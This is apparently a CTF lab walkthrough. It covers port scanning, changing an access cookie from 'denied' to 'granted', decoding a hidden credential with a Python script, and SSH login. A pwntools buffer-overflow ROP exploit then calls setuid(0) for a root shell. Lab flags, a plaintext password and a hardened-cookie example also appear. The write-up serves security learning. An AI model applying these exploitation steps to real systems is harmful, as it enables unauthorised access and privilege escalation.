Port scanning

sudo nmap --min-rate 10000 -p- 10.10.110.6 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-26 20:50 CST
Nmap scan report for 10.10.110.6
Host is up (0.24s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 11.50 seconds

It took several scans before the ports finally showed up...

sudo nmap -sT -sV -sC -O -p22,80 10.10.110.6
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-26 20:51 CST
Nmap scan report for 10.10.110.6
Host is up (0.23s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 60:b6:ad:4c:3e:f9:d2:ec:8b:cd:3b:45:a5:ac:5f:83 (RSA)
| 256 6f:9a:be:df:fc:95:a2:31:8f:db:e5:a2:da:8a:0c:3c (ECDSA)
|_ 256 e6:98:52:49:cf:f2:b8:65:d7:41:1c:83:2e:94:24:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Proving Grounds
| http-robots.txt: 1 disallowed entry
|_/zYdHuAKjP
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.10 (93%), Linux 5.4 (93%), Adtran 424RG FTTH gateway (92%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (91%), Linux 2.6.18 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.78 seconds

Most likely the way in is through the web service.

Web

The default page is a hacker-themed page; viewing the source reveals a /upcoming.php.

Then I noticed there is an "access" cookie, but right now we are "denied".

The operatives page lists a bunch of names; save them for later.

robots.txt contains a directory: /zYdHuAKjP

But it says no permission... Searched a bit: the antonym of denied is granted, so change the cookie and refresh the page.

This gives:

hEzAdCfHzA::hEzAdCfHzAhAiJzAeIaDjBcBhHgAzAfHfN

Looks like a credential?
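The access cookie above is the classic "authorization decided by a client-controlled value" mistake. As an added illustration (not code from the room or the original post; the cookie layout and secret are assumptions), here is the weak check beside a hardened one that binds the cookie value to a server-side HMAC, so editing "denied" to "granted" no longer works:

```python
import hmac
import hashlib

# Hypothetical server-side secret; never sent to the client.
SECRET = b"server-side-secret"


def authorize_weak(cookies):
    """The pattern seen on the box: trust whatever value the client sends."""
    return cookies.get("access") == "granted"


def issue_access_cookie(value, secret=SECRET):
    """Server issues access=<value>.<hmac-sha256(value)>; the tag binds value to secret."""
    tag = hmac.new(secret, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def authorize_hardened(cookies, secret=SECRET):
    """Honour 'granted' only when the tag verifies; any edit to the value fails."""
    raw = cookies.get("access", "")
    value, sep, tag = raw.rpartition(".")
    if not sep:
        return False  # no tag at all, e.g. a hand-written "granted"
    expected = hmac.new(secret, value.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected) and value == "granted"


def tampered(cookie):
    """Simulates the edit made in the writeup: replace 'denied' with 'granted'."""
    return cookie.replace("denied", "granted")
```

A server-side session store (role looked up by an opaque session id) removes the decision from the client entirely; the signed cookie is the minimal fix that keeps the existing layout.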

According to the room hint, "zA" should become "a".

hEadCfHa::hEadCfHahAiJaeIaDjBcBhHgAafHfN

But I tried it and SSH login fails; clearly this credential looks a bit odd. If z is 26 and A is 1, then a would be 27??

Then hE could be read as 8+5=13, which is m? And indeed every group is one lowercase plus one uppercase letter.

Too lazy to write my own, so pasting someone else's script (guilty conscience

encoded = "hEzAdCfHzA::hEzAdCfHzAhAiJzAeIaDjBcBhHgAzAfHfN"
all_alpha = "" # String of all lowercase english alphabets

for i in range(ord('a'), ord('z') + 1):
    all_alpha += chr(i)

print("Encoded => " + encoded)
print("All alphabets => " + all_alpha)
print("Decoded => ", end="")

# This loop iterates over all PAIRS of the alphabets, ignoring the '::'

for i in range(0, len(encoded), 2):
    first_char = encoded[i] # Since the first char in all pairs is lowercase
    second_char = encoded[i + 1].lower() # Since the second char in all pairs is uppercase

    if first_char == ':':
        print(":", end="")
        continue

    first_alpha_position = ord(first_char) - ord('a') + 1
    second_alpha_position = ord(second_char) - ord('a') + 1

    # The modulo operation takes care of the "imagine the list of alphabets arranged in a circular loop" part I was talking about
    decoded_alpha_position = (first_alpha_position + second_alpha_position) % 26

    decoded_alpha = all_alpha[decoded_alpha_position - 1] # Array indexes start at 0, yes?
    print(decoded_alpha, end="")

print("")

Result: magna:magnaisanelephant

And the users we collected earlier include magna as well, so SSH in.

flag1

9184177ecaa83073cbbf36f1414cc029

Privilege escalation

Found there is another user, spooky, and a note he left asking me to crack this binary.

scp magna@10.10.110.6:/home/magna/hacktheworld .

Opened it in IDA; there is a gets, so there should be a buffer overflow.

from pwn import *
import sys

# Checking argument

if len(sys.argv) != 2:
    print("Usage: " + sys.argv[0] + " target")
    exit(0)

# Getting argument

target = sys.argv[1]

# Establishing ssh session

ssh_session = ssh('magna', target, password='magnaisanelephant')
info("Opening ./hacktheworld")
proc = ssh_session.process('./hacktheworld')

# Preparing the payload

junk = b"A" * 72 # Just some junk
pop_ret = p64(0x00400773) # POP RDI; RET gadget
zero = p64(0x0) # 0x00000000 to 'push' on to stack
setuid = p64(0x004006c4) # setuid() call in call_bash

payload = junk + pop_ret + zero + setuid

# Getting root shell

proc.recvrepeat(0.1) # Receives the "Who do you want to hacK? " line
proc.sendline(payload) # Sends the payload
proc.interactive() # Gets an interactive shell

Decompiling it in IDA shows a call_bash backdoor function.

python exp.py ip

Already ROOT.

spooky flag

69ee352fb139c9d0699f6f399b63d9d7

root.txt

bc55a426e98deb673beabda50f24ce66

Ramblings

In practice this room can be finished with just two scripts; I am still not very familiar with the PWN part.